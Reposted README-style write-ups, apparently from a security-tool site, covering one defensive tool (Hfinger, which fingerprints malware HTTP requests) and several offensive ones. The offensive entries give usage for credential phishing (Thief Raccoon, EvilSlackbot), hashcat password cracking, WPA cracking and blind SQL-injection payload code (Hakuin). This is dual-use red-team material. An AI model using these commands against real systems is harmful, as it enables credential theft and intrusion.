
Hfinger - Fingerprinting HTTP Requests

By: Zion3R


A tool for fingerprinting HTTP requests of malware. Based on Tshark and written in Python 3. Working prototype stage :-)

Its main objective is to provide unique representations (fingerprints) of malware requests, which help in their identification. Unique means here that each fingerprint should be seen in only one particular malware family, yet one family can have multiple fingerprints. Hfinger represents the request in a shorter form than printing the whole request, while remaining human-interpretable.

Hfinger can be used in manual malware analysis but also in sandbox systems or SIEMs. The generated fingerprints are useful for grouping requests, pinpointing requests to particular malware families, identifying different operations of one family, or discovering unknown malicious requests omitted by other security systems but which share a fingerprint.

An academic paper accompanies work on this tool, describing, for example, the motivation behind design choices and the evaluation of the tool compared to p0f, FATT, and Mercury.


    The idea

    The basic assumption of this project is that HTTP requests of different malware families are more or less unique, so they can be fingerprinted to provide some sort of identification. Hfinger retains information about the structure and values of some headers to provide a means for further analysis, for example, grouping of similar requests; at this moment, this is still a work in progress.

    After analysis of malware's HTTP requests and headers, we have identified the following parts of requests as being most distinctive:

    • Request method
    • Protocol version
    • Header order
    • Popular headers' values
    • Payload length, entropy, and presence of non-ASCII characters

    Additionally, some standard features of the request URL were also considered. All these parts were translated into a set of features, described in detail here.

    The above features are translated into a varying-length representation, which is the actual fingerprint. Depending on the report mode, different features are used to fingerprint requests. More information on these modes is presented below. The feature selection process will be described in the forthcoming academic paper.

    Installation

    Minimum requirements needed before installation:

    • Python >= 3.3
    • Tshark >= 2.2.0

    Installation available from PyPI:

    pip install hfinger

    Hfinger has been tested on Xubuntu 22.04 LTS with the tshark package in version 3.6.2, but it should also work with older versions, such as 2.6.10 on Xubuntu 18.04 or 3.2.3 on Xubuntu 20.04.

    Please note that, as with any PoC, you should run Hfinger in a separate environment, at least inside a Python virtual environment. Its setup is not covered here, but you can try this tutorial.

    Usage

    After installation, you can call the tool directly from a command line with hfinger or as a Python module with python -m hfinger.

    For example:

    foo@bar:~$ hfinger -f /tmp/test.pcap
    [{"epoch_time": "1614098832.205385000", "ip_src": "127.0.0.1", "ip_dst": "127.0.0.1", "port_src": "53664", "port_dst": "8080", "fingerprint": "2|3|1|php|0.6|PO|1|us-ag,ac,ac-en,ho,co,co-ty,co-le|us-ag:f452d7a9/ac:as-as/ac-en:id/co:Ke-Al/co-ty:te-pl|A|4|1.4"}]

    Help can be displayed with short -h or long --help switches:

    usage: hfinger [-h] (-f FILE | -d DIR) [-o output_path] [-m {0,1,2,3,4}] [-v]
    [-l LOGFILE]

    Hfinger - fingerprinting malware HTTP requests stored in pcap files

    optional arguments:
    -h, --help show this help message and exit
    -f FILE, --file FILE Read a single pcap file
    -d DIR, --directory DIR
    Read pcap files from the directory DIR
    -o output_path, --output-path output_path
    Path to the output directory
    -m {0,1,2,3,4}, --mode {0,1,2,3,4}
    Fingerprint report mode.
    0 - similar number of collisions and fingerprints as mode 2, but using fewer features,
    1 - representation of all designed features, but a little more collisions than modes 0, 2, and 4,
    2 - optimal (the default mode),
    3 - the lowest number of generated fingerprints, but the highest number of collisions,
    4 - the highest fingerprint entropy, but slightly more fingerprints than modes 0-2
    -v, --verbose Report information about non-standard values in the request
    (e.g., non-ASCII characters, no CRLF tags, values not present in the configuration list).
    Without --logfile (-l) will print to the standard error.
    -l LOGFILE, --logfile LOGFILE
    Output logfile in the verbose mode. Implies -v or --verbose switch.

    You must provide a path to a pcap file (-f), or a directory (-d) with pcap files. The output is in JSON format. It will be printed to standard output or to the provided directory (-o) using the name of the source file. For example, output of the command:

    hfinger -f example.pcap -o /tmp/pcap

    will be saved to:

    /tmp/pcap/example.pcap.json

    The report mode switch -m/--mode can be used to change the default report mode by providing an integer in the range 0-4. The modes differ in the represented request features and rounding methods. The default mode (2) was chosen by us to represent all features that are usually used during requests' analysis, while also offering a low number of collisions and generated fingerprints. With other modes, you can achieve different goals. For example, in mode 3 you get a lower number of generated fingerprints but a higher chance of a collision between malware families. If you are unsure, you don't have to change anything. More information on report modes is here.

    Beginning with version 0.2.1, Hfinger is less verbose. You should use -v/--verbose if you want to receive information about encountered non-standard values of headers, non-ASCII characters in the non-payload part of the request, lack of CRLF tags (\r\n\r\n), and other problems with analyzed requests that are not application errors. When any such issues are encountered in verbose mode, they will be printed to the standard error output. You can also save the log to a defined location using the -l/--logfile switch (it implies -v/--verbose). The log data will be appended to the log file.

    Using hfinger in a Python application

    Beginning with version 0.2.0, Hfinger can be imported into other Python applications. To use it in your app, simply import the hfinger_analyze function from hfinger.analysis and call it with a path to the pcap file and the reporting mode. The returned result is a list of dicts with fingerprinting results.

    For example:

    from hfinger.analysis import hfinger_analyze

    pcap_path = "SPECIFY_PCAP_PATH_HERE"
    reporting_mode = 4
    print(hfinger_analyze(pcap_path, reporting_mode))

    Beginning with version 0.2.1, Hfinger uses the logging module for logging information about encountered non-standard values of headers, non-ASCII characters in the non-payload part of the request, lack of CRLF tags (\r\n\r\n), and other problems with analyzed requests that are not application errors. Hfinger creates its own logger using the name hfinger, but without prior configuration, this log information is in practice discarded. If you want to receive it, configure the hfinger logger before calling hfinger_analyze: set the log level to logging.INFO, configure a log handler to your needs, and add it to the logger. More information is available in the hfinger_analyze function docstring.
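    For instance, a minimal configuration that prints the hfinger log to standard error could look like the sketch below (it only uses the standard logging module; the handler and format are up to you, and the pcap path is a placeholder):

    import logging

    from hfinger.analysis import hfinger_analyze

    # Configure the "hfinger" logger before calling hfinger_analyze,
    # otherwise its log records are effectively discarded.
    logger = logging.getLogger("hfinger")
    logger.setLevel(logging.INFO)
    handler = logging.StreamHandler()  # logs to standard error by default
    handler.setFormatter(logging.Formatter("%(asctime)s %(levelname)s %(message)s"))
    logger.addHandler(handler)

    print(hfinger_analyze("SPECIFY_PCAP_PATH_HERE", 2))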

    Fingerprint creation

    A fingerprint is based on features extracted from a request. Usage of particular features from the full list depends on the chosen report mode from a predefined list (more information on report modes is here). The figure below represents the creation of an exemplary fingerprint in the default report mode.

    Three parts of the request are analyzed to extract information: URI, headers' structure (including method and protocol version), and payload. Particular features of the fingerprint are separated using | (pipe). The final fingerprint generated for the POST request from the example is:

    2|3|1|php|0.6|PO|1|us-ag,ac,ac-en,ho,co,co-ty,co-le|us-ag:f452d7a9/ac:as-as/ac-en:id/co:Ke-Al/co-ty:te-pl|A|4|1.4

    The creation of features is described below in the order of appearance in the fingerprint.

    Firstly, URI features are extracted:

    • URI length, represented as a logarithm base 10 of the length, rounded to an integer (in the example the URI is 43 characters long, so log10(43) ≈ 2),
    • number of directories (in the example there are 3 directories),
    • average directory length, represented as a logarithm base 10 of the actual average directory length, rounded to an integer (in the example there are three directories with a total length of 20 characters (6+6+8), so log10(20/3) ≈ 1),
    • extension of the requested file, but only if it is on a list of known extensions in hfinger/configs/extensions.txt,
    • average value length, represented as a logarithm base 10 of the actual average value length, rounded to one decimal point (in the example the two values have the same length of 4 characters, so the average is 4, and log10(4) ≈ 0.6).
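    As an illustration only (this is not Hfinger's actual code, and details such as rounding may differ), the URI numbers from the example can be reproduced roughly like this:

    import math
    from urllib.parse import urlsplit

    def uri_features(uri):
        parts = urlsplit(uri)
        # Directories are the path segments between the leading "/" and the file name.
        dirs = [d for d in parts.path.split("/")[1:-1] if d]
        # Values are the right-hand sides of key=value pairs in the query string.
        values = [kv.split("=", 1)[1] for kv in parts.query.split("&") if "=" in kv]
        filename = parts.path.rsplit("/", 1)[-1]
        return {
            "uri_length": round(math.log10(len(uri))),
            "dir_count": len(dirs),
            "avg_dir_length": round(math.log10(sum(map(len, dirs)) / len(dirs))) if dirs else 0,
            # kept only if present on the known-extensions list (hfinger/configs/extensions.txt)
            "extension": filename.rsplit(".", 1)[-1] if "." in filename else "",
            "avg_value_length": round(math.log10(sum(map(len, values)) / len(values)), 1) if values else 0,
        }

    # A 43-character URI with three directories of 6, 6 and 8 characters and two
    # 4-character values yields 2, 3, 1 and 0.6, matching the example fingerprint.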

    Secondly, header structure features are analyzed:

    • request method, encoded as the first two letters of the method (PO),
    • protocol version, encoded as an integer (1 for version 1.1, 0 for version 1.0, and 9 for version 0.9),
    • order of the headers,
    • and popular headers and their values.

    To represent the order of the headers in the request, each header's name is encoded according to the schema in hfinger/configs/headerslow.json; for example, the User-Agent header is encoded as us-ag. Encoded names are separated by ,. If the header name does not start with an upper case letter (or any of its parts does not, when analyzing compound headers such as Accept-Encoding), then the encoded representation is prefixed with !. If the header name is not on the list of known headers, it is hashed using the FNV1a hash, and the hash is used as the encoding.
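    The FNV1a hash itself is tiny; the sketch below shows the 32-bit variant rendered as hexadecimal, which matches the 8-character hashes visible in the example fingerprint (e.g. us-ag:f452d7a9), although the exact input normalization Hfinger applies is not shown here:

    def fnv1a_32(data: bytes) -> str:
        # 32-bit FNV-1a: offset basis 2166136261, prime 16777619.
        h = 2166136261
        for byte in data:
            h ^= byte
            h = (h * 16777619) & 0xFFFFFFFF
        return f"{h:08x}"

    # e.g. encoding an unknown header name:
    print(fnv1a_32(b"X-Custom-Header"))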

    When analyzing popular headers, the request is checked to see whether they appear in it. These headers are:

    • Connection
    • Accept-Encoding
    • Content-Encoding
    • Cache-Control
    • TE
    • Accept-Charset
    • Content-Type
    • Accept
    • Accept-Language
    • User-Agent

    When a popular header is found in the request, its value is checked against a table of typical values to create pairs of header_name_representation:value_representation. The name of the header is encoded according to the schema in hfinger/configs/headerslow.json (as presented before), and the value is encoded according to the schema stored in the hfinger/configs directory or the configs.py file, depending on the header. In the above example, Accept is encoded as ac and its value */* as as-as (asterisk-asterisk), giving ac:as-as. The pairs are inserted into the fingerprint in the order of appearance in the request and are delimited using /. If the header value cannot be found in the encoding table, it is hashed using the FNV1a hash.
    If the header value is composed of multiple values, they are tokenized to provide a list of values delimited with ,, for example, Accept: */*, text/* would give ac:as-as,te-as. However, at this point of development, if the header value contains a "quality value" tag (q=), then the whole value is encoded with its FNV1a hash. Finally, values of User-Agent and Accept-Language headers are directly encoded using their FNV1a hashes.

    Finally, the payload features:

    • presence of non-ASCII characters, represented with the letter N if they are present, and with A otherwise,
    • payload's Shannon entropy, rounded to an integer,
    • and payload length, represented as a logarithm base 10 of the actual payload length, rounded to one decimal point.
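    As a sketch (again, not the tool's code), these three payload features can be computed as follows:

    import math
    from collections import Counter

    def payload_features(payload: bytes):
        if not payload:
            return "A", 0, 0
        # "N" if any byte falls outside the ASCII range, "A" otherwise.
        ascii_flag = "N" if any(b > 0x7F for b in payload) else "A"
        # Shannon entropy in bits per byte, rounded to an integer.
        counts = Counter(payload)
        entropy = -sum((c / len(payload)) * math.log2(c / len(payload)) for c in counts.values())
        # Payload length as log10 of the length, rounded to one decimal place.
        length = round(math.log10(len(payload)), 1)
        return ascii_flag, round(entropy), length

    # An all-ASCII payload of roughly 25 bytes with entropy around 4 bits per byte
    # would produce the "A|4|1.4" tail seen in the example fingerprint.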

    Report modes

    Hfinger operates in five report modes, which differ in the features represented in the fingerprint, and thus in the information extracted from requests. These are (with the number used in the tool configuration):

    • mode 0 - producing a similar number of collisions and fingerprints as mode 2, but using fewer features,
    • mode 1 - representing all designed features, but producing a little more collisions than modes 0, 2, and 4,
    • mode 2 - optimal (the default mode), representing all features which are usually used during requests' analysis, while also offering a low number of collisions and generated fingerprints,
    • mode 3 - producing the lowest number of generated fingerprints of all modes, but achieving the highest number of collisions,
    • mode 4 - offering the highest fingerprint entropy, but also generating slightly more fingerprints than modes 0-2.

    The modes were chosen to optimize Hfinger's ability to uniquely identify malware families against the number of generated fingerprints. Modes 0, 2, and 4 offer a similar number of collisions between malware families; however, mode 4 generates a little more fingerprints than the other two. Mode 2 represents more request features than mode 0 with a comparable number of generated fingerprints and collisions. Mode 1 is the only one representing all designed features, but it increases the number of collisions almost twofold compared to modes 0, 2, and 4. Mode 3 produces at least two times fewer fingerprints than the other modes, but it introduces about nine times more collisions. A description of all designed features is here.

    The modes consist of the following features (in the order of appearance in the fingerprint):

    • mode 0: number of directories, average directory length represented as an integer, extension of the requested file, average value length represented as a float, order of headers, popular headers and their values, payload length represented as a float.
    • mode 1: URI length represented as an integer, number of directories, average directory length represented as an integer, extension of the requested file, variable length represented as an integer, number of variables, average value length represented as an integer, request method, version of protocol, order of headers, popular headers and their values, presence of non-ASCII characters, payload entropy represented as an integer, payload length represented as an integer.
    • mode 2: URI length represented as an integer, number of directories, average directory length represented as an integer, extension of the requested file, average value length represented as a float, request method, version of protocol, order of headers, popular headers and their values, presence of non-ASCII characters, payload entropy represented as an integer, payload length represented as a float.
    • mode 3: URI length represented as an integer, average directory length represented as an integer, extension of the requested file, average value length represented as an integer, order of headers.
    • mode 4: URI length represented as a float, number of directories, average directory length represented as a float, extension of the requested file, variable length represented as a float, average value length represented as a float, request method, version of protocol, order of headers, popular headers and their values, presence of non-ASCII characters, payload entropy represented as a float, payload length represented as a float.



    Thief Raccoon - Login Phishing Tool

    By: Zion3R


    Thief Raccoon is a tool designed for educational purposes to demonstrate how phishing attacks can be conducted on various operating systems. This tool is intended to raise awareness about cybersecurity threats and help users understand the importance of security measures like 2FA and password management.


    Features

    • Phishing simulation for Windows 10, Windows 11, Windows XP, Windows Server, Ubuntu, Ubuntu Server, and macOS.
    • Capture user credentials for educational demonstrations.
    • Customizable login screens that mimic real operating systems.
    • Full-screen mode to enhance the phishing simulation.

    Installation

    Prerequisites

    • Python 3.x
    • pip (Python package installer)
    • ngrok (for exposing the local server to the internet)

    Download and Install

    1. Clone the repository:

    git clone https://github.com/davenisc/thief_raccoon.git
    cd thief_raccoon

    2. Install the Python venv package:

    apt install python3.11-venv

    3. Create and activate the virtual environment:

    python -m venv raccoon_venv
    source raccoon_venv/bin/activate

    4. Install the required libraries:

    pip install -r requirements.txt

    Usage

    1. Run the main script:

    python app.py

    2. Select the operating system for the phishing simulation:

    After running the script, you will be presented with a menu to select the operating system. Enter the number corresponding to the OS you want to simulate.

    3. Access the phishing page:

    If you are on the same local network (LAN), open your web browser and navigate to http://127.0.0.1:5000.

    If you want to make the phishing page accessible over the internet, use ngrok.

    Using ngrok

    1. Download and install ngrok:

    Download ngrok from ngrok.com and follow the installation instructions for your operating system.

    2. Expose your local server to the internet:

    3. Get the public URL:

    After running the above command, ngrok will provide you with a public URL. Share this URL with your test subjects to access the phishing page over the internet.

    How to install Ngrok on Linux?

    1. Install ngrok via Apt with the following command:

    curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc \
      | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \
      && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \
      | sudo tee /etc/apt/sources.list.d/ngrok.list \
      && sudo apt update \
      && sudo apt install ngrok

    2. Run the following command to add your authtoken to the default ngrok.yml:

    ngrok config add-authtoken xxxxxxxxx--your-token-xxxxxxxxxxxxxx

    Deploy your app online

    3. Put your app online at an ephemeral domain forwarding to your upstream service. For example, if the app is listening on http://localhost:5000, run:

    ngrok http http://localhost:5000

    Example

    1. Run the main script:

    python app.py

    2. Select Windows 11 from the menu:

    Select the operating system for phishing:
    1. Windows 10
    2. Windows 11
    3. Windows XP
    4. Windows Server
    5. Ubuntu
    6. Ubuntu Server
    7. macOS
    Enter the number of your choice: 2

    3. Access the phishing page:

    Open your browser and go to http://127.0.0.1:5000 or the ngrok public URL.

    Disclaimer

    This tool is intended for educational purposes only. The author is not responsible for any misuse of this tool. Always obtain explicit permission from the owner of the system before conducting any phishing tests.

    License

    This project is licensed under the MIT License. See the LICENSE file for details.

    ScreenShots

    Credits

    Developer: @davenisc Web: https://davenisc.com



    ROPDump - A Command-Line Tool Designed To Analyze Binary Executables For Potential Return-Oriented Programming (ROP) Gadgets, Buffer Overflow Vulnerabilities, And Memory Leaks

    By: Zion3R


    ROPDump is a tool for analyzing binary executables to identify potential Return-Oriented Programming (ROP) gadgets, as well as detecting potential buffer overflow and memory leak vulnerabilities.


    Features

    • Identifies potential ROP gadgets in binary executables.
    • Detects potential buffer overflow vulnerabilities by analyzing vulnerable functions.
    • Generates exploit templates to make the exploit process faster.
    • Identifies potential memory leak vulnerabilities by analyzing memory allocation functions.
    • Can print function names and addresses for further analysis.
    • Supports searching for specific instruction patterns.

    Usage

    • <binary>: Path to the binary file for analysis.
    • -s, --search SEARCH: Optional. Search for specific instruction patterns.
    • -f, --functions: Optional. Print function names and addresses.

    Examples

    • Analyze a binary without searching for specific instructions:

    python3 ropdump.py /path/to/binary

    • Analyze a binary and search for specific instructions:

    python3 ropdump.py /path/to/binary -s "pop eax"

    • Analyze a binary and print function names and addresses:

    python3 ropdump.py /path/to/binary -f



    EvilSlackbot - A Slack Bot Phishing Framework For Red Teaming Exercises

    By: Zion3R

    EvilSlackbot

    A Slack Attack Framework for conducting Red Team and phishing exercises within Slack workspaces.

    Disclaimer

    This tool is intended for Security Professionals only. Do not use this tool against any Slack workspace without explicit permission to test. Use at your own risk.


    Background

    Thousands of organizations utilize Slack to help their employees communicate, collaborate, and interact. Many of these Slack workspaces install apps or bots that can be used to automate different tasks within Slack. These bots are individually provided permissions that dictate what tasks the bot is permitted to request via the Slack API. To authenticate to the Slack API, each bot is assigned an API token that begins with xoxb or xoxp. More often than not, these tokens are leaked somewhere. When these tokens are exfiltrated during a Red Team exercise, it can be a pain to properly utilize them. Now EvilSlackbot is here to automate and streamline that process. You can use EvilSlackbot to send spoofed Slack messages, phishing links, and files, and to search for secrets leaked in Slack.

    Phishing Simulations

    In addition to red teaming, EvilSlackbot has also been developed with Slack phishing simulations in mind. To use EvilSlackbot to conduct a Slack phishing exercise, simply create a bot within Slack, give your bot the permissions required for your intended test, and provide EvilSlackbot with a list of emails of employees you would like to test with simulated phishes (links, files, spoofed messages).

    Installation

    EvilSlackbot requires Python 3 and the slackclient library:

    pip3 install slackclient

    Usage

    usage: EvilSlackbot.py [-h] -t TOKEN [-sP] [-m] [-s] [-a] [-f FILE] [-e EMAIL]
    [-cH CHANNEL] [-eL EMAIL_LIST] [-c] [-o OUTFILE] [-cL]

    options:
    -h, --help show this help message and exit

    Required:
    -t TOKEN, --token TOKEN
    Slack Oauth token

    Attacks:
    -sP, --spoof Spoof a Slack message, customizing your name, icon, etc
    (Requires -e,-eL, or -cH)
    -m, --message Send a message as the bot associated with your token
    (Requires -e,-eL, or -cH)
    -s, --search Search slack for secrets with a keyword
    -a, --attach Send a message containing a malicious attachment (Requires -f
    and -e,-eL, or -cH)

    Arguments:
    -f FILE, --file FILE Path to file attachment
    -e EMAIL, --email EMAIL
    Email of target
    -cH CHANNEL, --channel CHANNEL
    Target Slack Channel (Do not include #)
    -eL EMAIL_LIST, --email_list EMAIL_LIST
    Path to list of emails separated by newline
    -c, --check Lookup and display the permissions and available attacks
    associated with your provided token.
    -o OUTFILE, --outfile OUTFILE
    Outfile to store search results
    -cL, --channel_list List all public Slack channels

    Token

    To use this tool, you must provide an xoxb or xoxp token.

    Required:
    -t TOKEN, --token TOKEN (Slack xoxb/xoxp token)
    python3 EvilSlackbot.py -t <token>

    Attacks

    Depending on the permissions associated with your token, there are several attacks that EvilSlackbot can conduct. EvilSlackbot will automatically check what permissions your token has and will display them and any attack that you are able to perform with your given token.

    Attacks:
    -sP, --spoof Spoof a Slack message, customizing your name, icon, etc (Requires -e,-eL, or -cH)

    -m, --message Send a message as the bot associated with your token (Requires -e,-eL, or -cH)

    -s, --search Search slack for secrets with a keyword

    -a, --attach Send a message containing a malicious attachment (Requires -f and -e,-eL, or -cH)

    Spoofed messages (-sP)

    With the correct token permissions, EvilSlackbot allows you to send phishing messages while impersonating the botname and bot photo. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

    python3 EvilSlackbot.py -t <xoxb token> -sP -e <email address>

    python3 EvilSlackbot.py -t <xoxb token> -sP -eL <email list>

    python3 EvilSlackbot.py -t <xoxb token> -sP -cH <Channel name>

    Phishing Messages (-m)

    With the correct token permissions, EvilSlackbot allows you to send phishing messages containing phishing links. What makes this attack different from the Spoofed attack is that this method will send the message as the bot associated with your provided token. You will not be able to choose the name or image of the bot sending your phish. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

    python3 EvilSlackbot.py -t <xoxb token> -m -e <email address>

    python3 EvilSlackbot.py -t <xoxb token> -m -eL <email list>

    python3 EvilSlackbot.py -t <xoxb token> -m -cH <Channel name>

    Secret Search (-s)

    With the correct token permissions, EvilSlackbot allows you to search Slack for secrets via a keyword search. Right now, this attack requires an xoxp token, as xoxb tokens cannot be given the proper permissions to keyword search within Slack. Use the -o argument to write the search results to an outfile.

    python3 EvilSlackbot.py -t <xoxp token> -s -o <outfile.txt>

    Attachments (-a)

    With the correct token permissions, EvilSlackbot allows you to send file attachments. The attachment attack requires a path to the file (-f) you wish to send. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

    python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -e <email address>

    python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -eL <email list>

    python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -cH <Channel name>

    Arguments

    Arguments:
    -f FILE, --file FILE Path to file attachment
    -e EMAIL, --email EMAIL Email of target
    -cH CHANNEL, --channel CHANNEL Target Slack Channel (Do not include #)
    -eL EMAIL_LIST, --email_list EMAIL_LIST Path to list of emails separated by newline
    -c, --check Lookup and display the permissions and available attacks associated with your provided token.
    -o OUTFILE, --outfile OUTFILE Outfile to store search results
    -cL, --channel_list List all public Slack channels

    Channel Search

    With the correct permissions, EvilSlackbot can search for and list all of the public channels within the Slack workspace. This can help with planning where to send channel messages. Use -o to write the list to an outfile.

    python3 EvilSlackbot.py -t <xoxb token> -cL


    LDAPWordlistHarvester - A Tool To Generate A Wordlist From The Information Present In LDAP, In Order To Crack Passwords Of Domain Accounts

    By: Zion3R


    A tool to generate a wordlist from the information present in LDAP, in order to crack non-random passwords of domain accounts.


    Features

    The bigger the domain is, the better the wordlist will be.

    • [x] Creates a wordlist based on the following information found in the LDAP:
    • [x] User: name and sAMAccountName
    • [x] Computer: name and sAMAccountName
    • [x] Groups: name
    • [x] Organizational Units: name
    • [x] Active Directory Sites: name and descriptions
    • [x] All LDAP objects: descriptions
    • [x] Choose wordlist output file name with option --outputfile

    Demonstration

    To generate a wordlist from the LDAP of the domain domain.local you can use this command:

    ./LDAPWordlistHarvester.py -d 'domain.local' -u 'Administrator' -p 'P@ssw0rd123!' --dc-ip 192.168.1.101

    You will get the following output if using the Python version:

    You will get the following output if using the Powershell version:


    Cracking passwords

    Once you have this wordlist, you should crack your NTDS using hashcat with --loopback and the rule clem9669_large.rule:

    ./hashcat --hash-type 1000 --potfile-path ./client.potfile ./client.ntds ./wordlist.txt --rules ./clem9669_large.rule --loopback

    Usage

    $ ./LDAPWordlistHarvester.py -h
    LDAPWordlistHarvester.py v1.1 - by @podalirius_

    usage: LDAPWordlistHarvester.py [-h] [-v] [-o OUTPUTFILE] --dc-ip ip address [-d DOMAIN] [-u USER] [--ldaps] [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key] [-k]

    options:
    -h, --help show this help message and exit
    -v, --verbose Verbose mode. (default: False)
    -o OUTPUTFILE, --outputfile OUTPUTFILE
    Path to output file of wordlist.

    Authentication & connection:
    --dc-ip ip address IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted it will use the domain part (FQDN) specified in the identity parameter
    -d DOMAIN, --domain DOMAIN
    (FQDN) domain to authenticate to
    -u USER, --user USER user to authenticate with
    --ldaps Use LDAPS instead of LDAP

    Credentials:
    --no-pass Don't ask for password (useful for -k)
    -p PASSWORD, --password PASSWORD
    Password to authenticate with
    -H [LMHASH:]NTHASH, --hashes [LMHASH:]NTHASH
    NT/LM hashes, format is LMhash:NThash
    --aes-key hex key AES key to use for Kerberos Authentication (128 or 256 bits)
    -k, --kerberos Use Kerberos authentication. Grabs credentials from .ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line


    Pyrit - The Famous WPA Precomputed Cracker

    By: Zion3R


    Pyrit allows you to create massive databases of pre-computed WPA/WPA2-PSK authentication data in a space-time trade-off. By using the computational power of multi-core CPUs and other platforms through ATI-Stream, Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security protocols.

    WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre-shared key. This master key is derived from a password which the administrating user has to pre-configure, e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate following traffic. The "shortcut" of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home and small-office use at the cost of making the protocol vulnerable to brute-force attacks against its key negotiation phase; it ultimately allows the password that protects the network to be revealed. This vulnerability has to be considered exceptionally disastrous as the protocol allows much of the key derivation to be pre-computed, making simple brute-force attacks even more alluring to the attacker. For more background see this article on the project's blog (Outdated).


    The author does not encourage or support using Pyrit for the infringement of peoples' communication-privacy. The exploration and realization of the technology discussed here motivate as a purpose of their own; this is documented by the open development, strictly sourcecode-based distribution and 'copyleft'-licensing.

    Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms including FreeBSD, MacOS X and Linux as operating system, and x86-, alpha-, arm-, hppa-, mips-, powerpc-, s390 and sparc-processors.

    Attacking WPA/WPA2 by brute force boils down to computing Pairwise Master Keys as fast as possible. Every Pairwise Master Key is 'worth' exactly one megabyte of data getting pushed through PBKDF2-HMAC-SHA1. In turn, computing 10,000 PMKs per second is equivalent to hashing 9.8 gigabytes of data with SHA1 in one second.
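    The derivation itself is the standard PBKDF2-HMAC-SHA1 construction defined by IEEE 802.11i (4096 iterations, 256-bit output, with the ESSID as salt); a single PMK can be computed in Python like this, with placeholder network name and passphrase:

    import hashlib

    def wpa_pmk(passphrase: str, essid: str) -> bytes:
        # 4096 iterations of HMAC-SHA1 producing a 32-byte Pairwise Master Key,
        # which is the computation Pyrit precomputes per (ESSID, password) pair.
        return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)

    print(wpa_pmk("a secret passphrase", "SomeNetwork").hex())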

    These are examples of how multiple computational nodes can access a single storage server over various ways provided by Pyrit:

    • A single storage (e.g. a MySQL-server)
    • A local network that can access the storage server directly and provides four computational nodes on various levels, with only one node actually accessing the storage server itself.
    • Another, untrusted network can access the storage through Pyrit's RPC interface and provides three computational nodes, two of which actually access the RPC interface.

    What's new

    • Fixed #479 and #481
    • Pyrit CUDA now compiles in OSX with Toolkit 7.5
    • Added use_CUDA and use_OpenCL in config file
    • Improved cores listing and managing
    • limit_ncpus now disables all CPUs when set to value <= 0
    • Improve CCMP packet identification, thanks to yannayl

    See CHANGELOG file for a better description.

    How to use

    Pyrit compiles and runs fine on Linux, MacOS X and BSD. I don't care about Windows; drop me a line (read: patch) if you make Pyrit work without copying half of GNU ... A guide for installing Pyrit on your system can be found in the wiki. There is also a Tutorial and a reference manual for the commandline-client.

    How to participate

    You may want to read this wiki entry if you are interested in porting Pyrit to a new hardware platform. For contributions or bug reports, submit an issue at https://github.com/JPaulMora/Pyrit/issues.



    Hakuin - A Blazing Fast Blind SQL Injection Optimization And Automation Framework

    By: Zion3R


    Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.

    Hakuin has been presented at esteemed academic and industrial conferences:

    • BlackHat MEA, Riyadh, 2023
    • Hack in the Box, Phuket, 2023
    • IEEE S&P Workshop on Offensive Technologies (WOOT), 2023

    More information can be found in our paper and slides.


    Installation

    To install Hakuin, simply run:

    pip3 install hakuin

    Developers should install the package locally and set the -e flag for editable mode:

    git clone git@github.com:pruzko/hakuin.git
    cd hakuin
    pip3 install -e .

    Examples

    Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from Requester and override the request method. The method must also determine whether the query resolved to True or False.

    Example 1 - Query Parameter Injection with Status-based Inference
    import aiohttp
    from hakuin import Requester

    class StatusRequester(Requester):
        async def request(self, ctx, query):
            r = await aiohttp.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
            return r.status == 200
    Example 2 - Header Injection with Content-based Inference
    class ContentRequester(Requester):
        async def request(self, ctx, query):
            headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
            r = await aiohttp.get(f'http://vuln.com/', headers=headers)
            return 'found' in await r.text()

    To start extracting data, use the Extractor class. It requires a DBMS object to construct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), and MSSQL (SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.

    Example 1 - Extracting SQLite/MySQL/PSQL/MSSQL
    import asyncio
    from hakuin import Extractor, Requester
    from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL

    class StatusRequester(Requester):
        ...

    async def main():
        # requester: Use this Requester
        # dbms: Use this DBMS
        # n_tasks: Spawns N tasks that extract column rows in parallel
        ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
        ...

    if __name__ == '__main__':
        asyncio.get_event_loop().run_until_complete(main())

    Now that everything is set, you can start extracting DB metadata.

    Example 1 - Extracting DB Schemas
    # strategy:
    # 'binary': Use binary search
    # 'model': Use pre-trained model
